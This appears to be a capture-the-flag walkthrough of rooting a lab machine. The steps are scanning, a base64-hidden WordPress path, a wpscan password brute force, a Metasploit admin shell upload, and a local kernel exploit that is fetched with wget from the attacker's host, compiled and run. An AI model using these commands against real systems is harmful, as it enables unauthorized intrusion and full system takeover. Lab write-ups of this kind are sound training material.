We scan the box with nmap –A –T4 –p- 192.168.1.8 –vv

We use dirb http://192.168.1.8 /usr/share/dirb/wordlists/big.xt

When viewing the source on the path http://192.168.1.8/index2 we get this:

THpFd01UQXhNREU9IHRyeSBoYXJk when decoding it as base64 we get:
LzEwMTAxMDE= try hard then decoding LzEwMTAxMDE again gave use :
/1010101 a new path, when viewing it it’s a WordPress path:

Running wpscan to enumerate the usernames found the username admin, so we can try to brute force it :
Wpscan –url http://192.168.1.8/1010101/wordpress -U admin -P /root/pass/rockyou.txt –v

We got the password Password@123 , but when trying to login we get directed to http://127.0.0.1/1010101/wordpress/wp-login.php, so wo going to try Metasploit:
use exploit/unix/webapp/wp_admin_shell_upload
set TARGETURI /1010101/wordpress
set rhosts 192.168.1.8
set password Password@123
set username admin

A simple cat /etc/issue gave us Ubuntu 12.04.5 LTS, and using searchsploit we get:

Exploit 37292.c
The we transfer the exploit to the target machine using python –m SimpleHTTPServer 80, and on the target machine in the /tmp folder we do wget http://192.168.1.11/ 37292.c
We compile it using gcc –o script 37292.c and then we run it ./script and we got ROOT and that’s it no flag to capture.
